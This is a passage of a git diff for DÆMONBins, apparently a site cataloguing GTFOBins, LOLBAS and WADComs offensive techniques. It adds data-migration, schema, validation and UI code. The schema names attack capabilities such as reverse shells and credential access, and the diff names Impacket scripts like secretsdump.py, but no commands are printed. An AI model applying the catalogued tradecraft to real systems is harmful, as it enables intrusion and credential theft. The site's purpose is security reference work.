1. Split the umbrella `wadcoms:Impacket` tool into one tool per impacket + * example script (secretsdump.py, ntlmrelayx.py, psexec.py, …). + * 2. Fold case-duplicate WADComs families (Enum4Linux / enum4linux) onto one + * canonical page so no tool's techniques are silently dropped by the + * static router. + * + * It reads and rewrites the checked-in JSON directly, because the full builder + * (build-dataset.mjs) needs the vendored upstreams under vendor/ which are not + * present at deploy/dev time. build-dataset.mjs applies the *same* + * normalisations (via wadcoms-normalize.mjs), so a future `npm run data` with + * vendor/ present produces an identical result. + * + * The WADComs tool records are fully derived from their techniques, so the + * migration rebuilds EVERY `wadcoms:` tool from the transformed techniques + * (mirroring the builder's toolsFromWad) and asserts that unaffected tools are + * bit-for-bit unchanged — leaving GTFOBins / LOLBAS / daemon tools alone. + * + * Safe to re-run: once the split is applied there is no `wadcoms:Impacket` + * left, and the case-fold is a no-op the second time. + */ +import { readFileSync, writeFileSync } from 'node:fs'; +import { fileURLToPath } from 'node:url'; +import { dirname, join, resolve } from 'node:path'; +import { splitImpacket, canonicalizeFamilyCase } from './wadcoms-normalize.mjs'; + +const __dirname = dirname(fileURLToPath(import.meta.url)); +const ROOT = resolve(__dirname, '..'); +const SRC = join(ROOT, 'src', 'data'); + +const uniq = (a) => [...new Set(a.filter((x) => x != null && x !== ''))]; +const read = (p) => JSON.parse(readFileSync(p, 'utf8')); + +// Rebuild the per-tool record set for the wadcoms namespace from its +// techniques — a verbatim mirror of build-dataset.mjs's toolsFromWad. +function toolsFromWad(techniques) { + const map = new Map(); + for (const t of techniques) { + if (!map.has(t.toolId)) { + map.set(t.toolId, { id: t.toolId, name: t.toolName, source: t.source, platform: [], references: [], count: 0 }); + } + const tool = map.get(t.toolId); + tool.count++; + tool.platform = uniq([...tool.platform, ...t.platform]); + tool.references = uniq([...tool.references, ...t.references]); + if (t.source === 'DAEMON' && tool.source !== 'DAEMON') tool.source = 'WADComs'; + } + return [...map.values()]; +} + +function main() { + const techniques = read(join(SRC, 'techniques.json')); + const tools = read(join(SRC, 'tools.json')); + const facets = read(join(SRC, 'facets.json')); + + const isWad = (id) => id.startsWith('wadcoms:'); + + // ---- Transform techniques ------------------------------------------------- + const before = techniques.filter((t) => t.toolId === 'wadcoms:Impacket').length; + const split = techniques.map(splitImpacket); + // Fold case-duplicate families over the WADComs namespace ONLY, exactly as + // build-dataset.mjs does (it runs canonicalizeFamilyCase over the WADComs + // techniques alone), so a fresh regen and this migration stay identical. + const foldedById = new Map( + canonicalizeFamilyCase(split.filter((t) => isWad(t.toolId))).map((t) => [t.id, t]), + ); + const techniques2 = split.map((t) => foldedById.get(t.id) ?? t); + + const impacketTools = new Set( + techniques2.filter((t) => t.toolId.startsWith('wadcoms:Impacket-')).map((t) => t.toolId), + ); + console.log(`Impacket: ${before} techniques under wadcoms:Impacket -> ${impacketTools.size} script tools`); + + // ---- Rebuild the wadcoms tool records ------------------------------------ + const wadTechs = techniques2.filter((t) => isWad(t.toolId)); + const rebuiltWad = toolsFromWad(wadTechs); + const rebuiltById = new Map(rebuiltWad.map((t) => [t.id, t])); + + // Assert unaffected wadcoms tools are unchanged (bit-for-bit). + const oldWadById = new Map(tools.filter((t) => isWad(t.id)).map((t) => [t.id, t])); + let drifted = 0; + for (const [id, rebuilt] of rebuiltById) { + const old = oldWadById.get(id); + if (old && JSON.stringify(old) !== JSON.stringify(rebuilt)) { + // Expected only for a family whose membership actually changed (none but + // the impacket/enum4linux families should differ). + if (!/^wadcoms:(Impacket-|Enum4Linux$|enum4linux$)/.test(id)) { + console.error(` ! unexpected drift in ${id}`); + drifted++; + } + } + } + if (drifted) { console.error(`ABORT: ${drifted} unaffected wadcoms tool(s) drifted — refusing to write.`); process.exit(1); } + + const nonWadTools = tools.filter((t) => !isWad(t.id)); + const tools2 = [...nonWadTools, ...rebuiltWad]; + + // ---- Recompute the derived facet counts ---------------------------------- + const count = (arr) => arr.reduce((m, v) => ((m[v] = (m[v] || 0) + 1), m), {}); + facets.counts.tools = tools2.length; + facets.counts.toolsBySource = count(tools2.map((t) => t.source)); + + // ---- Emit (match build-dataset.mjs formatting) --------------------------- + // public/data/techniques.json is a gitignored build artifact regenerated by + // `npm run data:public`, so only the source-of-truth files are written here. + writeFileSync(join(SRC, 'techniques.json'), JSON.stringify(techniques2)); + writeFileSync(join(SRC, 'tools.json'), JSON.stringify(tools2)); + writeFileSync(join(SRC, 'facets.json'), JSON.stringify(facets, null, 2)); + + console.log(`Tools: ${tools.length} -> ${tools2.length} (wadcoms ${oldWadById.size} -> ${rebuiltWad.length})`); + console.log(`toolsBySource: ${JSON.stringify(facets.counts.toolsBySource)}`); + console.log('Wrote src/data/{techniques,tools,facets}.json'); +} + +main(); diff --git a/scripts/technique-schema.mjs b/scripts/technique-schema.mjs @@ -0,0 +1,71 @@ +/** + * The unified Technique vocabulary + Zod schema — the single source of truth + * shared by the dataset builder (build-dataset.mjs), the standalone validator + * (validate-data.mjs, run in CI over the committed JSON) and the one-shot + * migrations. Keep it dependency-free beyond zod so it loads anywhere. + * + * Mirrors src/lib/taxonomy.ts; the TS side is the UI vocabulary, this is the + * data contract. They must agree — validate-data.mjs cross-checks them. + */ +import { z } from 'zod'; + +export const PLATFORMS = ['Linux', 'Windows', 'macOS', 'ActiveDirectory']; +export const SOURCES = ['GTFOBins', 'LOLBAS', 'WADComs', 'DAEMON']; +export const CAPABILITIES = [ + 'Execution', 'Reverse/Bind Shell', + 'File Download', 'File Upload', 'File Read', 'File Write', 'File Copy', + 'Library Load', 'Compile', + 'Privilege Escalation', 'UAC Bypass', 'AWL / Policy Bypass', + 'Defense Evasion', 'Credential Access', + 'Discovery', 'Persistence', 'Lateral Movement', 'Collection', +]; + +// Only absolute http(s) URLs may become <a href> — a stray `javascript:` or +// relative reference from an upstream merge must fail validation, not render. +const HTTP_URL = /^https?:\/\/\S+$/; +export const HttpUrl = z.string().regex(HTTP_URL, 'must be an absolute http(s) URL'); + +export const TechniqueSchema = z.object({ + id: z.string().min(1), + toolId: z.string().min(1), + toolName: z.string().min(1), + name: z.string().optional(), + source: z.enum(SOURCES), + platform: z.array(z.enum(PLATFORMS)).min(1), + capability: z.array(z.enum(CAPABILITIES)), + nativeCategory: z.array(z.string()), + command: z.string().min(1), + description: z.string().optional(), + usecase: z.string().optional(), + mitre: z.array(z.string().regex(/^T\d{4}(\.\d{3})?$/, 'must be a MITRE ATT&CK technique id')), + privilege: z.string().optional(), + context: z.string().optional(), + requires: z.array(z.string()).optional(), + services: z.array(z.string()).optional(), + fullPath: z.array(z.string()).optional(), + toolType: z.string().optional(), + detection: z.array(z.object({ type: z.string(), value: z.string() })).optional(), + references: z.array(HttpUrl), + added: z.boolean().optional(), + verifyNote: z.string().optional(), +}); + +/** + * Validate a whole Technique[]: schema per record + unique ids. Returns a list + * of human-readable problems (empty = valid). Pure; callers decide how to fail. + */ +export function validateTechniques(techniques) { + const problems = []; + const ids = new Set(); + for (const t of techniques) { + const r = TechniqueSchema.safeParse(t); + if (!r.success) { + const why = r.error.issues.map((i) => `${i.path.join('.')} ${i.message}`).join('; '); + problems.push(`invalid ${t && t.id ? t.id : '<no id>'}: ${why}`); + continue; + } + if (ids.has(t.id)) problems.push(`duplicate id ${t.id}`); + ids.add(t.id); + } + return problems; +} diff --git a/scripts/validate-data.mjs b/scripts/validate-data.mjs @@ -0,0 +1,80 @@ +/** + * `npm run validate:data` — validate the *committed* dataset without touching + * vendor/ or regenerating anything. CI runs this on every push so a hand-edit + * or a bad migration can never reach a deploy. + * + * Checks: every technique passes TechniqueSchema; ids are unique; every + * technique's toolId exists in tools.json; every tool has >= 1 technique; the + * facet counts in facets.json match the data; the vocabulary in + * src/lib/taxonomy.ts still agrees with technique-schema.mjs; the committed + * src/data/index-hash.json still describes this data (else `npm run build:index`). + */ +import { readFileSync } from 'node:fs'; +import { fileURLToPath } from 'node:url'; +import { dirname, join, resolve } from 'node:path'; +import { validateTechniques, PLATFORMS, SOURCES, CAPABILITIES } from './technique-schema.mjs'; +import { buildIndex } from './build-index.mjs'; + +const ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '..'); +const read = (p) => JSON.parse(readFileSync(join(ROOT, p), 'utf8')); + +const techniques = read('src/data/techniques.json'); +const tools = read('src/data/tools.json'); +const facets = read('src/data/facets.json'); + +const problems = validateTechniques(techniques); + +// Referential integrity. +const toolIds = new Set(tools.map((t) => t.id)); +const used = new Set(); +for (const t of techniques) { + used.add(t.toolId); + if (!toolIds.has(t.toolId)) problems.push(`orphan technique ${t.id}: toolId ${t.toolId} not in tools.json`); +} +for (const tool of tools) { + if (!used.has(tool.id)) problems.push(`orphan tool ${tool.id}: no techniques`); +} +const seenTools = new Set(); +for (const tool of tools) { + if (seenTools.has(tool.id)) problems.push(`duplicate tool id ${tool.id}`); + seenTools.add(tool.id); +} + +// Facet counts must describe this exact dataset. +const c = facets.counts || {}; +if (c.techniques !== techniques.length) problems.push(`facets.counts.techniques=${c.techniques} but data has ${techniques.length}`); +if (c.tools !== tools.length) problems.push(`facets.counts.tools=${c.tools} but data has ${tools.length}`); +const added = techniques.filter((t) => t.added).length; +if (c.added !== added) problems.push(`facets.counts.added=${c.added} but data has ${added}`); +const bySource = {}; +for (const t of techniques) bySource[t.source] = (bySource[t.source] || 0) + 1; +for (const s of SOURCES) { + if ((c.bySource || {})[s] !== (bySource[s] || undefined) && !(bySource[s] === undefined && (c.bySource || {})[s] === undefined)) { + problems.push(`facets.counts.bySource.${s}=${(c.bySource || {})[s]} but data has ${bySource[s] || 0}`); + } +} + +// The content-addressed list index must be the one this data produces. +try { + const idx = JSON.parse(readFileSync(join(ROOT, 'src/data/index-hash.json'), 'utf8')); + const fresh = buildIndex(techniques); + if (idx.hash !== fresh.hash || idx.file !== fresh.file) problems.push(`src/data/index-hash.json is stale (${idx.file} vs ${fresh.file}) — run npm run build:index`); +} catch (e) { + problems.push(`src/data/index-hash.json missing or unreadable — run npm run build:index (${e.message})`); +} + +// Vocabulary drift between the data contract and the UI taxonomy. +const taxonomy = readFileSync(join(ROOT, 'src/lib/taxonomy.ts'), 'utf8'); +for (const [label, list] of [['platform', PLATFORMS], ['source', SOURCES], ['capability', CAPABILITIES]]) { + for (const v of list) { + if (!taxonomy.includes(`'${v}'`)) problems.push(`${label} '${v}' is in technique-schema.mjs but not in src/lib/taxonomy.ts`); + } +} + +if (problems.length) { + console.error(`validate:data — ${problems.length} problem(s):`); + for (const p of problems.slice(0, 40)) console.error(` ✗ ${p}`); + if (problems.length > 40) console.error(` … and ${problems.length - 40} more`); + process.exit(1); +} +console.log(`validate:data — OK: ${techniques.length} techniques, ${tools.length} tools, ${added} NEW; schema, ids, tool links and facet counts all consistent.`); diff --git a/scripts/wadcoms-normalize.mjs b/scripts/wadcoms-normalize.mjs @@ -0,0 +1,97 @@ +/** + * WADComs family normalisation — shared by the dataset builder + * (build-dataset.mjs) and the one-time committed-data migration + * (split-impacket.mjs), so a fresh regen and the checked-in JSON agree. + * + * Two normalisations live here: + * + * 1. splitImpacket — Impacket is not one tool, it is a *suite* of independent + * example scripts (secretsdump.py, ntlmrelayx.py, psexec.py, …). WADComs + * files them all under a single "Impacket" family, which collapses ~48 + * distinct techniques onto one unreadable tool page. We split them back out + * by the actual `examples/<script>.py` each technique references, so every + * script gets its own tool exactly as impacket ships — `ntlmrelayx.py`'s + * ten relay variants group together, `secretsdump.py`'s two do, and so on. + * + * 2. canonicalizeFamilyCase — two WADComs families that differ only in case + * (e.g. `Enum4Linux` and `enum4linux`) slug to the same route, and the + * static tool page silently drops one. We fold case-variants of the same + * toolId onto a single canonical spelling (the one with more techniques). + * + * Both are pure and deterministic (no wall-clock, no randomness). + */ + +// Match `…/impacket/…/examples/<script>.py`. The script basename is impacket's +// own canonical casing (secretsdump, GetUserSPNs, getST, ntlmrelayx, …). +const IMPACKET_EXAMPLE_RE = /impacket\/(?:[^\s"']*\/)?examples\/([A-Za-z0-9_+.-]+)\.py/i; +const PY_BASENAME_RE = /([A-Za-z0-9_+.-]+)\.py/; + +/** + * Resolve the impacket example script a technique belongs to, preferring the + * `examples/<script>.py` reference URL and falling back to the first `*.py` + * token in the command. Returns null when neither resolves (the technique is + * then left under the umbrella Impacket tool rather than mis-filed). + */ +export function impacketScript(references = [], command = '') { + for (const r of references) { + const m = IMPACKET_EXAMPLE_RE.exec(String(r)); + if (m) return m[1]; + } + const m = PY_BASENAME_RE.exec(String(command)); + return m ? m[1] : null; +} + +/** + * If a technique is filed under the umbrella `wadcoms:Impacket` family, refile + * it under `wadcoms:Impacket-<script>` (toolName `Impacket-<script>`) so it + * lands on the script's own page. Idempotent and a no-op for everything else. + */ +export function splitImpacket(tech) { + if (tech.toolId !== 'wadcoms:Impacket') return tech; + const script = impacketScript(tech.references, tech.command); + if (!script) return tech; + return { ...tech, toolId: `wadcoms:Impacket-${script}`, toolName: `Impacket-${script}` }; +} + +/** + * Fold case-duplicate toolIds within one namespace onto a single canonical + * spelling. The canonical variant is the one carrying the most techniques + * (tie-break: an uppercase-initial family, then first-seen). Rewrites toolId + * and toolName in place on a shallow copy; every other field is untouched. + */ +export function canonicalizeFamilyCase(techniques) { + // key = lowercased toolId → { count, byId: Map<toolId,{count,name,first}> } + const groups = new Map(); + let order = 0; + for (const t of techniques) { + const key = t.toolId.toLowerCase(); + if (!groups.has(key)) groups.set(key, new Map()); + const byId = groups.get(key); + if (!byId.has(t.toolId)) byId.set(t.toolId, { count: 0, name: t.toolName, first: order++ }); + byId.get(t.toolId).count += 1; + } + + const canonical = new Map(); // toolId → { toolId, toolName } + for (const byId of groups.values()) { + if (byId.size < 2) continue; // no case-variants, nothing to fold + const variants = [...byId.entries()].map(([id, v]) => ({ id, ...v })); + variants.sort((a, b) => + b.count - a.count || + (isUpperInitialFamily(b.id) - isUpperInitialFamily(a.id)) || + a.first - b.first, + ); + const win = variants[0]; + for (const v of variants) canonical.set(v.id, { toolId: win.id, toolName: win.name }); + } + + if (!canonical.size) return techniques; + return techniques.map((t) => { + const c = canonical.get(t.toolId); + return c ? { ...t, toolId: c.toolId, toolName: c.toolName } : t; + }); +} + +function isUpperInitialFamily(toolId) { + const family = toolId.split(':').slice(1).join(':'); + return /^[A-Z]/.test(family) ? 1 : 0; +} diff --git a/src/components/Header.astro b/src/components/Header.astro @@ -3,6 +3,7 @@ import Icon from './Icon.astro'; import { url } from '../lib/url'; const MAIN_SITE = 'https://daemon-sec.xyz'; +const GITHUB = 'https://github.com/DAEMON-404/daemon-sec-lotl'; /** * The masthead, in the main site's grammar (daemon-sec.xyz `Masthead`): a @@ -14,7 +15,7 @@ const MAIN_SITE = 'https://daemon-sec.xyz'; * site's own — `[data-search-open]`, `[data-theme-toggle]` and * `[data-mobile-nav-toggle]` are bound in scripts/app.ts and SearchModal. */ -const NAV = [ +const NAV: { n: string; label: string; href: string; acc: string; exact?: boolean }[] = [ { n: '01', label: 'Catalog', href: url('catalog'), acc: 'love' }, { n: '02', label: 'GTFOBins', href: url('gtfobins'), acc: 'foam' }, { n: '03', label: 'LOLBAS', href: url('lolbas'), acc: 'iris' }, @@ -67,6 +68,7 @@ const CROSS = `<line x1="9" y1="1.3" x2="9" y2="22.7"/><line x1="6.1" y1="6.2" x <span class="icon-sun"><Icon name="sun" /></span> <span class="icon-moon"><Icon name="moon" /></span> </button> + <a class="mast__icon" href={GITHUB} target="_blank" rel="noopener" aria-label="Source on GitHub"><Icon name="github" /></a> <a class="mast__icon" href={MAIN_SITE} rel="noopener" aria-label="Back to DÆMON — main site"><Icon name="external" /></a> <button class="mast__burger" @@ -96,5 +98,9 @@ const CROSS = `<line x1="9" y1="1.3" x2="9" y2="22.7"/><line x1="6.1" y1="6.2" x <span class="n" style="--acc: var(--foam);">↗</span>Main site <span class="arrow" aria-hidden="true" style="--acc: var(--foam);">↗</span> </a> + <a href={GITHUB} target="_blank" rel="noopener"> + <span class="n" style="--acc: var(--gold);">↗</span>GitHub + <span class="arrow" aria-hidden="true" style="--acc: var(--gold);">↗</span> + </a> </nav> </header> diff --git a/src/components/HeroDeck.astro b/src/components/HeroDeck.astro @@ -0,0 +1,301 @@ +--- +import Icon from './Icon.astro'; +import facets from '../data/facets.json'; +import { SOURCES, SOURCE_META, SOURCE_ROUTE } from '../lib/taxonomy'; +import { url } from '../lib/url'; + +/** + * The home hero — a dark signal-field plate carrying the glitching, decoding + * DÆMONBINS wordmark and an inverse (cream) ledger of the four decks. The + * ledger's active deck cycles on a loop and takes over on hover/focus + * (scripts/hero.ts); the stat counters roll up from zero on load. The whole + * thing is server-rendered and fully legible with JS off — the script only + * adds the motion, and it all collapses under prefers-reduced-motion. + * + * Ported in spirit from daemon-sec.xyz's HeroLoop (the deck-lighting inverse + * plate) — rebuilt as progressive enhancement over static markup rather than a + * canvas cinematic, so it stays framework-free and degrades cleanly. + */ +const c = facets.counts; +const decks = SOURCES.map((id, i) => { + const s = SOURCE_META[id]; + return { + n: String(i + 1).padStart(2, '0'), + tag: s.tag, + label: s.label, + accent: s.accent, + blurb: s.blurb, + count: c.bySource[id] ?? 0, + route: SOURCE_ROUTE[id], + }; +}); +const WORDMARK = 'DÆMONBINS'; +--- +<section class="hero-deck plate bleed" data-hero aria-label="DÆMONBins"> + <canvas class="hero-deck__field" data-fuzz aria-hidden="true"></canvas> + <span class="banner__scrim" aria-hidden="true"></span> + <span class="grain grain--local" aria-hidden="true"></span> + <span class="scanlines" aria-hidden="true"></span> + + <div class="wrap hero-deck__body"> + <div class="hero-deck__lede"> + <p class="eyebrow" style="--acc: var(--love);"> + <span class="eyebrow__n">00</span> + <span class="eyebrow__mark">^:</span> + <span>DÆMONBins</span> + <span class="eyebrow__rule" aria-hidden="true"></span> + </p> + + <h1 class="hero-deck__wordmark glitch" data-text={WORDMARK} data-unscramble={WORDMARK}>{WORDMARK}</h1> + <p class="hero-deck__tagline">the Off-the-Land Almanac</p> + <p class="hero-deck__blurb"> + GTFOBins, LOLBAS and WADComs — merged, resynced, and extended with DÆMON's + fact-checked modern tradecraft. One filterable catalog, mapped to MITRE ATT&amp;CK. + </p> + + <div class="hero-deck__actions"> + <a class="btn" href={url('catalog')}><Icon name="terminal" /> Open the catalog</a> + <button class="btn btn--ghost" data-search-open type="button"><Icon name="search" /> Search</button> + <span class="hero-deck__hint">or press <kbd>/</kbd></span> + </div> + + <div class="hero-deck__stats"> + <div class="hero-deck__stat" style="--acc: var(--love);"> + <b data-count={c.techniques}>{c.techniques.toLocaleString()}</b><span>Techniques</span> + </div> + <div class="hero-deck__stat" style="--acc: var(--foam);"> + <b data-count={c.tools}>{c.tools.toLocaleString()}</b><span>Tools</span> + </div> + <div class="hero-deck__stat" style="--acc: var(--gold);"> + <b data-count={c.added}>{c.added.toLocaleString()}</b><span>DÆMON new</span> + </div> + </div> + </div> + + <aside class="hero-deck__panel plate-dawn corners" data-hero-panel> + <div class="hero-deck__panelhead"> + <span class="hero-deck__paneleyebrow"><span class="mark">^:</span> The four decks</span> + <span class="hero-deck__panellive"> + <span class="dmn-dot" style="--dot: var(--pine);"><i class="dmn-anim-pulse"></i><u class="dmn-anim-ring"></u></span> + live + </span> + </div> + + <p class="hero-deck__deckblurb" data-hero-blurb>{decks[0].blurb}</p> + + <ul class="hero-deck__list"> + {decks.map((d, i) => ( + <li> + <a + class:list={['hero-deck__row', i === 0 && 'is-lit']} + href={url(d.route)} + style={`--acc: var(--${d.accent});`} + data-hero-row={i} + data-blurb={d.blurb} + aria-current={i === 0 ? 'true' : undefined} + > + <span class="hero-deck__rn">{d.n}</span> + <span class="hero-deck__rtag">{d.tag}</span> + <span class="hero-deck__rname">{d.label}</span> + <span class="hero-deck__rcount">{d.count.toLocaleString()}</span> + <span class="hero-deck__rarrow" aria-hidden="true">→</span> + </a> + </li> + ))} + </ul> + </aside> + </div> +</section> + +<style> + .hero-deck { + position: relative; + overflow: hidden; + background: var(--plate); + border-bottom: 1px solid var(--fg); + } + .hero-deck__field { position: absolute; inset: 0; width: 100%; height: 100%; display: block; } + /* The scanlines/grain ride over the field; the body is lifted above them. */ + .hero-deck > .scanlines { opacity: 0.4; } + + .hero-deck__body { + position: relative; + z-index: 2; + display: grid; + gap: 2rem 3.5rem; + align-items: center; + padding-block: clamp(2.4rem, 6vw, 4.6rem); + } + @media (min-width: 960px) { + .hero-deck__body { grid-template-columns: minmax(0, 1fr) minmax(340px, 430px); } + } + + /* ---- Left: the lede ---------------------------------------------------- */ + .hero-deck__wordmark { + margin-top: 1.1rem; + font-family: var(--font-wordmark); + font-weight: 850; + font-stretch: 68%; + text-transform: uppercase; + font-size: clamp(2.7rem, 8.5vw, 5.6rem); + line-height: 0.9; + letter-spacing: -0.005em; + color: var(--fg); + } + .hero-deck__tagline { + margin-top: 0.5rem; + font-family: var(--font-lockup); + font-style: italic; + font-size: clamp(1.15rem, 2.6vw, 1.7rem); + line-height: 1.1; + color: var(--foam); + } + .hero-deck__blurb { + margin-top: 1.1rem; + max-width: 48ch; + color: var(--fg-dim); + font-size: 0.98rem; + line-height: 1.55; + text-wrap: pretty; + } + .hero-deck__actions { + margin-top: 1.5rem; + display: flex; + flex-wrap: wrap; + align-items: center; + gap: 0.7rem; + } + .hero-deck__hint { + font-family: var(--font-mono); + font-size: 11.5px; + letter-spacing: 0.04em; + color: var(--fg-faint); + } + .hero-deck__hint kbd { + font-family: var(--font-mono); + border: 1px solid var(--rule-hi); + padding: 0.05rem 0.35rem; + color: var(--fg-dim); + } + + .hero-deck__stats { + margin-top: 1.9rem; + padding-top: 1.3rem; + border-top: 1px solid var(--rule); + display: grid; + grid-template-columns: repeat(3, auto); + justify-content: start; + gap: 0 clamp(1.6rem, 4vw, 3rem); + } + .hero-deck__stat b { + display: block; + font-family: var(--font-display); + font-weight: 800; + font-stretch: 84%; + font-size: clamp(1.7rem, 3.4vw, 2.5rem); + letter-spacing: -0.03em; + line-height: 1; + color: var(--acc); + font-variant-numeric: tabular-nums; + } + .hero-deck__stat span { + display: block; + margin-top: 0.35rem; + font-family: var(--font-mono); + font-size: 10px; + letter-spacing: 0.16em; + text-transform: uppercase; + color: var(--fg-faint); + } + + /* ---- Right: the inverse deck ledger ------------------------------------ */ + .hero-deck__panel { + background: var(--base); + border: 1px solid var(--fg); + padding: 1.2rem 1.35rem 0.6rem; + color: var(--fg); + } + .hero-deck__panelhead { + display: flex; + align-items: center; + justify-content: space-between; + gap: 1rem; + padding-bottom: 0.7rem; + border-bottom: 1px solid var(--rule); + font-family: var(--font-mono); + font-size: 10px; + letter-spacing: 0.16em; + text-transform: uppercase; + color: var(--fg-faint); + } + .hero-deck__paneleyebrow .mark { color: var(--iris); margin-right: 0.35rem; } + .hero-deck__panellive { display: inline-flex; align-items: center; gap: 0.5rem; } + + .hero-deck__deckblurb { + margin: 0; + padding: 0.9rem 0 1rem; + font-size: 0.86rem; + line-height: 1.5; + color: var(--fg-dim); + /* Clamp to four lines so the cycling copy holds a constant height and the + ledger below it never jumps as the active deck changes. */ + display: -webkit-box; + -webkit-line-clamp: 4; + line-clamp: 4; + -webkit-box-orient: vertical; + overflow: hidden; + min-height: calc(0.86rem * 1.5 * 4 + 1.9rem); + } + + .hero-deck__list { list-style: none; margin: 0; padding: 0; } + .hero-deck__row { + position: relative; + display: grid; + grid-template-columns: auto auto minmax(0, 1fr) auto auto; + align-items: center; + gap: 0.7rem; + padding: 0.72rem 0.2rem 0.72rem 0.9rem; + border-top: 1px solid var(--rule); + color: var(--fg); + text-decoration: none; + transition: background-color 220ms ease; + } + .hero-deck__row::before { + content: ''; + position: absolute; + left: 0; top: 0; bottom: 0; + width: 2px; + background: var(--acc); + transform: scaleY(0); + transform-origin: 50% 50%; + transition: transform 260ms var(--ease-in); + } + .hero-deck__row.is-lit::before, + .hero-deck__row:hover::before { transform: scaleY(1); } + .hero-deck__row.is-lit, + .hero-deck__row:hover { background: var(--wash-strong); } + + .hero-deck__rn { + font-family: var(--font-mono); font-size: 10px; letter-spacing: 0.12em; + color: var(--fg-faint); transition: color 200ms ease; + } + .hero-deck__rtag { + font-family: var(--font-mono); font-size: 10px; letter-spacing: 0.14em; + text-transform: uppercase; color: var(--acc); + } + .hero-deck__rname { + font-family: var(--font-display); font-weight: 700; font-stretch: 86%; + font-size: 1.02rem; letter-spacing: -0.01em; text-transform: uppercase; + color: var(--fg); transition: color 200ms ease; min-width: 0; + overflow: hidden; text-overflow: ellipsis; white-space: nowrap; + } + .hero-deck__rcount { + font-family: var(--font-mono); font-size: 11px; color: var(--fg-faint); + font-variant-numeric: tabular-nums; + } + .hero-deck__rarrow { color: var(--acc); transition: transform 250ms var(--ease); } + .hero-deck__row.is-lit .hero-deck__rn { color: var(--acc); } + .hero-deck__row.is-lit .hero-deck__rname { color: var(--acc); } + .hero-deck__row.is-lit .hero-deck__rarrow, + .hero-deck__row:hover .hero-deck__rarrow { transform: translateX(4px); } +</style> diff --git a/src/components/SearchModal.astro b/src/components/SearchModal.astro @@ -2,16 +2,16 @@ import Icon from './Icon.astro'; --- <div class="search-overlay" data-search-overlay hidden> - <div class="search-box plate corners" role="dialog" aria-modal="true" aria-label="Search cheatsheets"> + <div class="search-box plate corners" role="dialog" aria-modal="true" aria-label="Search DÆMONBins"> <div class="search-titlebar"> - <span class="search-titlebar__label">Search — DÆMON//SEC</span> + <span class="search-titlebar__label">Search — DÆMONBins</span> <span class="search-titlebar__hints"><kbd>Esc</kbd> close · <kbd>⌘K</kbd> toggle</span> </div> <div class="search-inputrow"> <Icon name="search" class="search-ico" /> <input type="search" class="search-input" data-search-input - placeholder="Search sheets, tools, techniques…" autocomplete="off" + placeholder="Search tools, techniques, MITRE ids…" autocomplete="off" spellcheck="false" aria-label="Search query" role="combobox" aria-expanded="false" aria-controls="search-results" aria-autocomplete="list" /> @@ -19,7 +19,7 @@ import Icon from './Icon.astro'; <Icon name="close" /> </button> </div> - <p class="search-status mono" data-search-status hidden></p> + <p class="search-status mono" data-search-status aria-live="polite" hidden></p> <div class="search-results" data-search-results id="search-results" aria-label="Search results"> @@ -329,9 +329,14 @@ import Icon from './Icon.astro'; return loading; } + /* The element that opened the palette, so Esc / close hands focus back + to it instead of dropping it on <body>. */ + let opener: HTMLElement | null = null; + function open() { const overlay = overlayEl(); if (!overlay) return; + opener = document.activeElement instanceof HTMLElement ? document.activeElement : null; overlay.hidden = false; document.body.style.overflow = 'hidden'; loadPagefind(); @@ -345,6 +350,24 @@ import Icon from './Icon.astro'; const input = inputEl(); if (input) input.value = ''; write(HINT); + if (opener && opener.isConnected) opener.focus(); + opener = null; + } + + /* Keep Tab inside the dialog while it is open: the page behind the + scrim is inert to the eye but not to the keyboard. */ + function trapTab(e: KeyboardEvent) { + const overlay = overlayEl(); + if (!overlay || overlay.hidden || e.key !== 'Tab') return; + const focusable = Array.from(overlay.querySelectorAll<HTMLElement>( + 'input, button, a[href], [tabindex]:not([tabindex="-1"])', + )).filter((el) => !el.hidden && el.offsetParent !== null); + if (!focusable.length) return; + const first = focusable[0]; + const last = focusable[focusable.length - 1]; + const active = document.activeElement; + if (e.shiftKey && (active === first || !overlay.contains(active))) { e.preventDefault(); last.focus(); } + else if (!e.shiftKey && active === last) { e.preventDefault(); first.focus(); } } function esc(s: string) { @@ -521,7 +544,7 @@ import Icon from './Icon.astro'; const snip = tidyExcerpt(d.excerpt, title); return ( `<a class="s-result" id="s-opt-${i}" role="option" aria-selected="false"` + - ` href="${esc(d.url)}" style="--acc: var(--${kind.accent});">` + + ` href="${esc(String(d.url).replace(/(.)\/$/, '$1'))}" style="--acc: var(--${kind.accent});">` + `<span class="s-n">${String(i + 1).padStart(2, '0')}</span>` + `<span class="s-kind">${esc(kind.tag)}</span>` + `<span class="s-title">${esc(title)}</span>` + @@ -580,6 +603,7 @@ import Icon from './Icon.astro'; return; } + if (isOpen && e.key === 'Tab') { trapTab(e); return; } if (e.key === 'Escape' && isOpen) close(); else if (e.key === '/' && overlay?.hidden && !/^(INPUT|TEXTAREA|SELECT)$/.test((e.target as HTMLElement)?.tagName)) { e.preventDefault(); open(); } else if ((e.key === 'k' || e.key === 'K') && (e.metaKey || e.ctrlKey)) { e.preventDefault(); overlay?.hidden ? open() : close(); } diff --git a/src/components/SectionBanner.astro b/src/components/SectionBanner.astro @@ -76,215 +76,3 @@ const { n, label, title, blurb, stats = [], accent = 'foam' } = Astro.props; } </style> -<script> - /** - * The banners' signal field: six pixel-sorted streaks drifting on an - * additive blend, plus bright filaments, looping seamlessly every nine - * seconds. - * - * Ported from the main site's logic class. Four things are load-bearing - * and break the look if changed: the loop-global phase (so two plates on - * one page stay in step), the DPR backing (at 1× the streaks are 1–2px - * and upscaling blurs the pixel-sorted look), the erasure scrim, and the - * synchronous frame zero. - */ - - /** Band geometry — six streaks, three hues between them. `hue` is a - * *slot* (1 = iris, 2 = foam, 3 = love), not a colour: which colour a - * slot resolves to, and how it composites, is read from CSS at draw - * time so the field follows the mode along with everything else. */ - const BANDS = [ - { cy: 0.10, ch: 0.20, hue: 1, drift: 1, cyc: 1, dens: 12 }, - { cy: 0.34, ch: 0.24, hue: 2, drift: -1, cyc: 2, dens: 15 }, - { cy: 0.22, ch: 0.14, hue: 3, drift: 2, cyc: 1, dens: 9 }, - { cy: 0.60, ch: 0.22, hue: 2, drift: 1, cyc: 1, dens: 13 }, - { cy: 0.80, ch: 0.16, hue: 1, drift: -1, cyc: 2, dens: 10 }, - { cy: 0.92, ch: 0.14, hue: 3, drift: 1, cyc: 2, dens: 9 }, - ] as const; - - interface Palette { - blend: GlobalCompositeOperation; - bands: [string, string, string]; - filaments: [string, string, string]; - gain: number; - } - - const FALLBACK: Palette = { - blend: 'lighter', - bands: ['196,167,231', '156,207,216', '235,111,146'], - 